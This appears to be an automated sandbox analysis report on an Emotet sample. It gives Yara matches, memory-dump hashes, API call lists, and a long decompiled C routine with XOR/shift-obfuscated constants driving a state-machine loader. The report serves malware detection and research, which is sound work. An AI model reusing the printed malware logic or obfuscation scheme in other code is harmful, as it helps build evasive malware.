                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.682108397.0000000000231000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.687313669.0000000010001000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.681991915.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429831680.0000000002941000.00000010.00000800.00020000.00000000.sdmp, Offset: 02941000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_2940000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9c15aa56f9678e8a858ab685516818890a9203bed9a460f496a84efc4e36383a
                                                                                                                      • Instruction ID: 072b12390161f50a2c8e14c31dd4fadd4b7c1c949fcc08799806ff72b3f7b73f
                                                                                                                      • Opcode Fuzzy Hash: 9c15aa56f9678e8a858ab685516818890a9203bed9a460f496a84efc4e36383a
                                                                                                                      • Instruction Fuzzy Hash: 88D1E130A18A884FDB99DB2C8454B21BBE1FF5D344B1545AFE88ECB292DB24CCD1C795
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429831680.0000000002941000.00000010.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                                      • Associated: 00000004.00000003.429801070.0000000002940000.00000010.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_2940000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9c15aa56f9678e8a858ab685516818890a9203bed9a460f496a84efc4e36383a
                                                                                                                      • Instruction ID: 072b12390161f50a2c8e14c31dd4fadd4b7c1c949fcc08799806ff72b3f7b73f
                                                                                                                      • Opcode Fuzzy Hash: 9c15aa56f9678e8a858ab685516818890a9203bed9a460f496a84efc4e36383a
                                                                                                                      • Instruction Fuzzy Hash: 88D1E130A18A884FDB99DB2C8454B21BBE1FF5D344B1545AFE88ECB292DB24CCD1C795
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429854363.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                                                                                      • Opcode Fuzzy Hash: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.693356513.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_7ff00260000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8f6c842b845f843040c3a0925dfa7de87ce9f089b85ec76e48d9cd026da73950
                                                                                                                      • Instruction ID: 974a8992a35ad52dc6ce25e48a90bc15325f6a04411e8210db8ea1a9e0ec032f
                                                                                                                      • Opcode Fuzzy Hash: 8f6c842b845f843040c3a0925dfa7de87ce9f089b85ec76e48d9cd026da73950
                                                                                                                      • Instruction Fuzzy Hash: 9C715651A0EBC60FE71357786C697A17FB09F17214F0E40EBE488CB0E3E9485999C362
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.693356513.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_7ff00260000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8aa5b39e9cf500a71262fcc827fccf86c7c974b78088cfac4d249e7117e301cf
                                                                                                                      • Instruction ID: 6ed36d20e3ccc461d622a76460f1e24c217b6e3d811dd9bcbe74433d83e788d7
                                                                                                                      • Opcode Fuzzy Hash: 8aa5b39e9cf500a71262fcc827fccf86c7c974b78088cfac4d249e7117e301cf
                                                                                                                      • Instruction Fuzzy Hash: FE410E6194E7C24FE713977858A96A07FB19F53210B1E04EBD088CF0E3E94C999AD362
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:19.9%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510D0,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$DASHBOARD$d$d$e$kre3.l$kxnY_L?zqlSEuu5S2VFol6SH1q?86X^fU74B$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-1239791992
                                                                                                                      • Opcode ID: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction ID: 6af05ad5a12929315e9cbc9f274344785a9cdc676413f0efaf09fcd5afa7189b
                                                                                                                      • Opcode Fuzzy Hash: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction Fuzzy Hash: 50613FB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E00185CF9() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				signed int _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed short* _t381;
                                                                                                                      				signed int _t393;
                                                                                                                      				signed int* _t395;
                                                                                                                      				signed int _t397;
                                                                                                                      				signed int _t398;
                                                                                                                      				signed int _t399;
                                                                                                                      				signed int _t400;
                                                                                                                      				signed int _t401;
                                                                                                                      				signed int _t407;
                                                                                                                      				signed int* _t428;
                                                                                                                      				void* _t429;
                                                                                                                      				signed short* _t435;
                                                                                                                      				signed int* _t436;
                                                                                                                      
                                                                                                                      				_t436 =  &_v1720;
                                                                                                                      				_v1644 = 0xf4f2e5;
                                                                                                                      				_v1644 = _v1644 << 6;
                                                                                                                      				_t397 = 0x4a;
                                                                                                                      				_v1644 = _v1644 / _t397;
                                                                                                                      				_v1644 = _v1644 ^ 0x00d3d8d4;
                                                                                                                      				_t395 = 0;
                                                                                                                      				_v1660 = 0x8afd01;
                                                                                                                      				_t429 = 0xc405385;
                                                                                                                      				_v1660 = _v1660 | 0xf6dee043;
                                                                                                                      				_v1660 = _v1660 ^ 0x10b315be;
                                                                                                                      				_t398 = 0x45;
                                                                                                                      				_v1660 = _v1660 / _t398;
                                                                                                                      				_v1660 = _v1660 ^ 0x035da190;
                                                                                                                      				_v1692 = 0xc25321;
                                                                                                                      				_v1692 = _v1692 | 0x3e4ae4fc;
                                                                                                                      				_t399 = 0x12;
                                                                                                                      				_v1692 = _v1692 * 0x47;
                                                                                                                      				_v1692 = _v1692 ^ 0x6159278c;
                                                                                                                      				_v1692 = _v1692 ^ 0x0b15fa01;
                                                                                                                      				_v1572 = 0xf82306;
                                                                                                                      				_v1572 = _v1572 | 0xe3d21ea1;
                                                                                                                      				_v1572 = _v1572 ^ 0xe3f9e5ad;
                                                                                                                      				_v1676 = 0x48d4cb;
                                                                                                                      				_v1676 = _v1676 << 4;
                                                                                                                      				_v1676 = _v1676 + 0xffff2f85;
                                                                                                                      				_v1676 = _v1676 + 0x9649;
                                                                                                                      				_v1676 = _v1676 ^ 0x048c097a;
                                                                                                                      				_v1584 = 0x8f76c2;
                                                                                                                      				_v1584 = _v1584 * 0x1d;
                                                                                                                      				_v1584 = _v1584 ^ 0x10457475;
                                                                                                                      				_v1596 = 0xadf885;
                                                                                                                      				_v1596 = _v1596 ^ 0xa065608b;
                                                                                                                      				_v1596 = _v1596 ^ 0xa0c2245b;
                                                                                                                      				_v1684 = 0xeb1e45;
                                                                                                                      				_v1684 = _v1684 + 0x7cda;
                                                                                                                      				_v1684 = _v1684 / _t399;
                                                                                                                      				_v1684 = _v1684 + 0xffffa266;
                                                                                                                      				_v1684 = _v1684 ^ 0x0000adef;
                                                                                                                      				_v1632 = 0x65fdd9;
                                                                                                                      				_v1632 = _v1632 + 0xb49;
                                                                                                                      				_v1632 = _v1632 + 0xfffffa9d;
                                                                                                                      				_v1632 = _v1632 ^ 0x00600454;
                                                                                                                      				_v1716 = 0x9184ac;
                                                                                                                      				_v1716 = _v1716 + 0xffff0d2e;
                                                                                                                      				_v1716 = _v1716 | 0x6897691f;
                                                                                                                      				_v1716 = _v1716 ^ 0x2cb5e262;
                                                                                                                      				_v1716 = _v1716 ^ 0x442095be;
                                                                                                                      				_v1576 = 0x53941d;
                                                                                                                      				_v1576 = _v1576 >> 2;
                                                                                                                      				_v1576 = _v1576 ^ 0x001525d4;
                                                                                                                      				_v1640 = 0xd435ce;
                                                                                                                      				_v1640 = _v1640 + 0xffff1394;
                                                                                                                      				_v1640 = _v1640 + 0xffff8dc5;
                                                                                                                      				_v1640 = _v1640 ^ 0x00d594ec;
                                                                                                                      				_v1708 = 0x173594;
                                                                                                                      				_v1708 = _v1708 ^ 0xe44a87fe;
                                                                                                                      				_v1708 = _v1708 << 7;
                                                                                                                      				_v1708 = _v1708 + 0xee7d;
                                                                                                                      				_v1708 = _v1708 ^ 0x2ed8d8cc;
                                                                                                                      				_v1700 = 0x94f2ae;
                                                                                                                      				_v1700 = _v1700 << 3;
                                                                                                                      				_v1700 = _v1700 << 6;
                                                                                                                      				_v1700 = _v1700 * 0x58;
                                                                                                                      				_v1700 = _v1700 ^ 0x66d58e50;
                                                                                                                      				_v1604 = 0xd84545;
                                                                                                                      				_v1604 = _v1604 | 0x98cc5948;
                                                                                                                      				_v1604 = _v1604 ^ 0x98d8436e;
                                                                                                                      				_v1668 = 0xea4a2f;
                                                                                                                      				_v1668 = _v1668 + 0xf7bd;
                                                                                                                      				_v1668 = _v1668 >> 7;
                                                                                                                      				_v1668 = _v1668 ^ 0xf693418b;
                                                                                                                      				_v1668 = _v1668 ^ 0xf6966bd3;
                                                                                                                      				_v1580 = 0xa2c8e;
                                                                                                                      				_v1580 = _v1580 + 0x2944;
                                                                                                                      				_v1580 = _v1580 ^ 0x00011cb1;
                                                                                                                      				_v1720 = 0x34ce8d;
                                                                                                                      				_v1720 = _v1720 | 0xf5ffffea;
                                                                                                                      				_v1720 = _v1720 >> 9;
                                                                                                                      				_v1720 = _v1720 ^ 0x00732654;
                                                                                                                      				_v1564 = 0x8a9f58;
                                                                                                                      				_v1564 = _v1564 + 0x7c05;
                                                                                                                      				_v1564 = _v1564 ^ 0x008f283e;
                                                                                                                      				_v1588 = 0xa4f562;
                                                                                                                      				_v1588 = _v1588 ^ 0x7b7d16a6;
                                                                                                                      				_v1588 = _v1588 ^ 0x7bd14885;
                                                                                                                      				_v1704 = 0xee28fd;
                                                                                                                      				_v1704 = _v1704 + 0xffffe5b2;
                                                                                                                      				_v1704 = _v1704 + 0xffff824b;
                                                                                                                      				_v1704 = _v1704 + 0x581e;
                                                                                                                      				_v1704 = _v1704 ^ 0x00e0f0ab;
                                                                                                                      				_v1712 = 0x91da58;
                                                                                                                      				_v1712 = _v1712 << 3;
                                                                                                                      				_v1712 = _v1712 << 0xd;
                                                                                                                      				_v1712 = _v1712 ^ 0x485191fe;
                                                                                                                      				_v1712 = _v1712 ^ 0x920a86f0;
                                                                                                                      				_v1624 = 0xf1deea;
                                                                                                                      				_t400 = 3;
                                                                                                                      				_v1624 = _v1624 / _t400;
                                                                                                                      				_t401 = 0x38;
                                                                                                                      				_v1624 = _v1624 * 0x4f;
                                                                                                                      				_v1624 = _v1624 ^ 0x18ea6ffc;
                                                                                                                      				_v1680 = 0x898c63;
                                                                                                                      				_v1680 = _v1680 * 0x6a;
                                                                                                                      				_v1680 = _v1680 * 0x38;
                                                                                                                      				_v1680 = _v1680 | 0xa82efbb3;
                                                                                                                      				_v1680 = _v1680 ^ 0xfd6ff7e4;
                                                                                                                      				_v1688 = 0xae251e;
                                                                                                                      				_v1688 = _v1688 << 3;
                                                                                                                      				_v1688 = _v1688 >> 0xf;
                                                                                                                      				_v1688 = _v1688 + 0xb719;
                                                                                                                      				_v1688 = _v1688 ^ 0x000aff47;
                                                                                                                      				_v1696 = 0x40e656;
                                                                                                                      				_v1696 = _v1696 | 0x21fda4e6;
                                                                                                                      				_v1696 = _v1696 + 0xca7;
                                                                                                                      				_v1696 = _v1696 << 0xa;
                                                                                                                      				_v1696 = _v1696 ^ 0xf7c0cc6c;
                                                                                                                      				_v1652 = 0x8f24c5;
                                                                                                                      				_v1652 = _v1652 << 0xb;
                                                                                                                      				_v1652 = _v1652 ^ 0x5fc65761;
                                                                                                                      				_v1652 = _v1652 ^ 0x26eed855;
                                                                                                                      				_v1600 = 0xeb50f4;
                                                                                                                      				_v1600 = _v1600 | 0xe5f9ced2;
                                                                                                                      				_v1600 = _v1600 ^ 0xe5f6f1e5;
                                                                                                                      				_v1672 = 0x2ac6e7;
                                                                                                                      				_v1672 = _v1672 / _t401;
                                                                                                                      				_v1672 = _v1672 + 0xffffde53;
                                                                                                                      				_v1672 = _v1672 + 0xffff94e0;
                                                                                                                      				_v1672 = _v1672 ^ 0x000ac548;
                                                                                                                      				_v1648 = 0x7ee323;
                                                                                                                      				_v1648 = _v1648 ^ 0xc4404dab;
                                                                                                                      				_v1648 = _v1648 << 2;
                                                                                                                      				_v1648 = _v1648 ^ 0x10f162dd;
                                                                                                                      				_v1568 = 0xe6f77a;
                                                                                                                      				_v1568 = _v1568 | 0x9ec6220d;
                                                                                                                      				_v1568 = _v1568 ^ 0x9ee5ede4;
                                                                                                                      				_v1616 = 0x905f8c;
                                                                                                                      				_v1616 = _v1616 + 0xffff5c7c;
                                                                                                                      				_v1616 = _v1616 >> 2;
                                                                                                                      				_v1616 = _v1616 ^ 0x0024325f;
                                                                                                                      				_v1592 = 0xde4b6;
                                                                                                                      				_v1592 = _v1592 * 0x3f;
                                                                                                                      				_v1592 = _v1592 ^ 0x03679ec9;
                                                                                                                      				_v1664 = 0xe0cee4;
                                                                                                                      				_v1664 = _v1664 >> 2;
                                                                                                                      				_v1664 = _v1664 * 0x13;
                                                                                                                      				_v1664 = _v1664 * 0x71;
                                                                                                                      				_v1664 = _v1664 ^ 0xd75e35a6;
                                                                                                                      				_v1636 = 0x97f252;
                                                                                                                      				_v1636 = _v1636 | 0xcb237ae2;
                                                                                                                      				_v1636 = _v1636 << 0xf;
                                                                                                                      				_v1636 = _v1636 ^ 0xfd7df459;
                                                                                                                      				_v1656 = 0xc6c2a7;
                                                                                                                      				_v1656 = _v1656 + 0x66f2;
                                                                                                                      				_v1656 = _v1656 >> 0x10;
                                                                                                                      				_v1656 = _v1656 | 0xc8135773;
                                                                                                                      				_v1656 = _v1656 ^ 0xc81a6fdc;
                                                                                                                      				_v1608 = 0xd95490;
                                                                                                                      				_v1608 = _v1608 + 0xffff3702;
                                                                                                                      				_v1608 = _v1608 ^ 0x00d9a4ac;
                                                                                                                      				_v1612 = 0x2487c2;
                                                                                                                      				_t435 = _v1608;
                                                                                                                      				_v1612 = _v1612 * 0x77;
                                                                                                                      				_v1612 = _v1612 << 4;
                                                                                                                      				_v1612 = _v1612 ^ 0x0fb1a599;
                                                                                                                      				_v1620 = 0xa1030c;
                                                                                                                      				_v1620 = _v1620 >> 3;
                                                                                                                      				_v1620 = _v1620 << 0x10;
                                                                                                                      				_v1620 = _v1620 ^ 0x20685173;
                                                                                                                      				_v1628 = 0xb9794c;
                                                                                                                      				_v1628 = _v1628 >> 0xa;
                                                                                                                      				_v1628 = _v1628 >> 4;
                                                                                                                      				_v1628 = _v1628 ^ 0x0003794a;
                                                                                                                      				while(_t429 != 0x35deb36) {
                                                                                                                      					if(_t429 == 0x3b58d4d) {
                                                                                                                      						_push(_v1628);
                                                                                                                      						_push(_v1620);
                                                                                                                      						_push(_v1612);
                                                                                                                      						_push(_t395);
                                                                                                                      						_push(_t395);
                                                                                                                      						_push(_v1608);
                                                                                                                      						_push(_t401);
                                                                                                                      						_push(_t395);
                                                                                                                      						E00179700(_t435, _v1656, __eflags);
                                                                                                                      						_t395 = 1;
                                                                                                                      						__eflags = 1;
                                                                                                                      						L23:
                                                                                                                      						return _t395;
                                                                                                                      					}
                                                                                                                      					if(_t429 == 0x7ac99d0) {
                                                                                                                      						_t381 = _t435;
                                                                                                                      						__eflags =  *_t435 - _t395;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							L18:
                                                                                                                      							_t429 = 0xe3616dc;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						do {
                                                                                                                      							L11:
                                                                                                                      							__eflags =  *_t381 - 0x2c;
                                                                                                                      							if( *_t381 != 0x2c) {
                                                                                                                      								goto L17;
                                                                                                                      							}
                                                                                                                      							_t428 =  &_v1560;
                                                                                                                      							while(1) {
                                                                                                                      								_t381 =  &(_t381[1]);
                                                                                                                      								_t407 =  *_t381 & 0x0000ffff;
                                                                                                                      								__eflags = _t407;
                                                                                                                      								if(_t407 == 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								__eflags = _t407 - 0x20;
                                                                                                                      								if(_t407 == 0x20) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								 *_t428 = _t407;
                                                                                                                      								_t428 =  &(_t428[0]);
                                                                                                                      								__eflags = _t428;
                                                                                                                      							}
                                                                                                                      							_t401 = 0;
                                                                                                                      							__eflags = 0;
                                                                                                                      							 *_t428 = 0;
                                                                                                                      							L17:
                                                                                                                      							_t381 =  &(_t381[1]);
                                                                                                                      							__eflags =  *_t381 - _t395;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L18;
                                                                                                                      					}
                                                                                                                      					if(_t429 == 0x94e99a1) {
                                                                                                                      						_push(_t401);
                                                                                                                      						E0017EA7B( &_v520, _v1580, _v1644, _t401, _v1720, _v1564, _v1588); // executed
                                                                                                                      						E001912A8(_t401, _v1704, __eflags, _v1712, _v1624,  &_v1040);
                                                                                                                      						_push(_v1652);
                                                                                                                      						_push(_v1696);
                                                                                                                      						_push(0x1711dc);
                                                                                                                      						E0017E7CE(E0017AB66(_v1680, _v1688, __eflags), __eflags, _v1600,  &_v520, _v1680, _v1672, _v1648, _v1568, _v1616,  &_v1040);
                                                                                                                      						_t401 = _v1592;
                                                                                                                      						E0017AE03(_t401, _v1664, _v1636, _t385);
                                                                                                                      						_t436 =  &(_t436[0x17]);
                                                                                                                      						_t429 = 0x3b58d4d;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t429 == 0xc405385) {
                                                                                                                      						_t401 = 0x208;
                                                                                                                      						E00191310(0x208,  &_v1560, _v1660, _v1692, _v1572, _v1676);
                                                                                                                      						_t436 =  &(_t436[4]);
                                                                                                                      						_t429 = 0x35deb36;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					_t445 = _t429 - 0xe3616dc;
                                                                                                                      					if(_t429 == 0xe3616dc) {
                                                                                                                      						_push(_v1716);
                                                                                                                      						_push(_v1632);
                                                                                                                      						_push(0x17115c);
                                                                                                                      						_t393 = E0018FC96(_v1576, _v1640, E0017AB66(_v1596, _v1684, _t445), _v1708,  &_v1560); // executed
                                                                                                                      						asm("sbb edi, edi");
                                                                                                                      						_t401 = _v1700;
                                                                                                                      						_t429 = ( ~_t393 & 0x02043081) + 0x74a6920;
                                                                                                                      						E0017AE03(_t401, _v1604, _v1668, _t391);
                                                                                                                      						_t436 =  &(_t436[8]);
                                                                                                                      					}
                                                                                                                      					L20:
                                                                                                                      					if(_t429 != 0x74a6920) {
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L23;
                                                                                                                      				}
                                                                                                                      				_t435 = E0018E35A();
                                                                                                                      				_t429 = 0x7ac99d0;
                                                                                                                      				goto L20;
                                                                                                                      			}



























































                                                                                                                      0x0018613a
                                                                                                                      0x00186142
                                                                                                                      0x0018614d
                                                                                                                      0x00186158
                                                                                                                      0x00186163
                                                                                                                      0x0018616b
                                                                                                                      0x00186173
                                                                                                                      0x00186178
                                                                                                                      0x00186180
                                                                                                                      0x00186193
                                                                                                                      0x0018619a
                                                                                                                      0x001861a5
                                                                                                                      0x001861ad
                                                                                                                      0x001861b7
                                                                                                                      0x001861c0
                                                                                                                      0x001861c4
                                                                                                                      0x001861cc
                                                                                                                      0x001861d4
                                                                                                                      0x001861dc
                                                                                                                      0x001861e1
                                                                                                                      0x001861e9
                                                                                                                      0x001861f1
                                                                                                                      0x001861f9
                                                                                                                      0x001861fe
                                                                                                                      0x00186206
                                                                                                                      0x0018620e
                                                                                                                      0x00186219
                                                                                                                      0x00186224
                                                                                                                      0x0018622f
                                                                                                                      0x0018623c
                                                                                                                      0x00186243
                                                                                                                      0x00186247
                                                                                                                      0x0018624c
                                                                                                                      0x00186254
                                                                                                                      0x0018625c
                                                                                                                      0x00186261
                                                                                                                      0x00186266
                                                                                                                      0x0018626e
                                                                                                                      0x00186276
                                                                                                                      0x0018627b
                                                                                                                      0x00186280
                                                                                                                      0x00186288
                                                                                                                      0x0018629a
                                                                                                                      0x0018648d
                                                                                                                      0x00186491
                                                                                                                      0x00186495
                                                                                                                      0x0018649c
                                                                                                                      0x0018649d
                                                                                                                      0x0018649e
                                                                                                                      0x001864a9
                                                                                                                      0x001864aa
                                                                                                                      0x001864ad
                                                                                                                      0x001864b7
                                                                                                                      0x001864b7
                                                                                                                      0x001864bb
                                                                                                                      0x001864c4
                                                                                                                      0x001864c4
                                                                                                                      0x001862a6
                                                                                                                      0x00186427
                                                                                                                      0x00186429
                                                                                                                      0x0018642d
                                                                                                                      0x00186462
                                                                                                                      0x00186462
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018642f
                                                                                                                      0x0018642f
                                                                                                                      0x0018642f
                                                                                                                      0x00186433
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00186435
                                                                                                                      0x0018644a
                                                                                                                      0x0018644a
                                                                                                                      0x0018644d
                                                                                                                      0x00186450
                                                                                                                      0x00186453
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018643e
                                                                                                                      0x00186442
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00186444
                                                                                                                      0x00186447
                                                                                                                      0x00186447
                                                                                                                      0x00186447
                                                                                                                      0x00186455
                                                                                                                      0x00186455
                                                                                                                      0x00186457
                                                                                                                      0x0018645a
                                                                                                                      0x0018645a
                                                                                                                      0x0018645d
                                                                                                                      0x0018645d
                                                                                                                      0x00000000
                                                                                                                      0x0018642f
                                                                                                                      0x001862b2
                                                                                                                      0x00186368
                                                                                                                      0x0018638e
                                                                                                                      0x001863aa
                                                                                                                      0x001863af
                                                                                                                      0x001863b3
                                                                                                                      0x001863bf
                                                                                                                      0x001863fd
                                                                                                                      0x0018640e
                                                                                                                      0x00186415
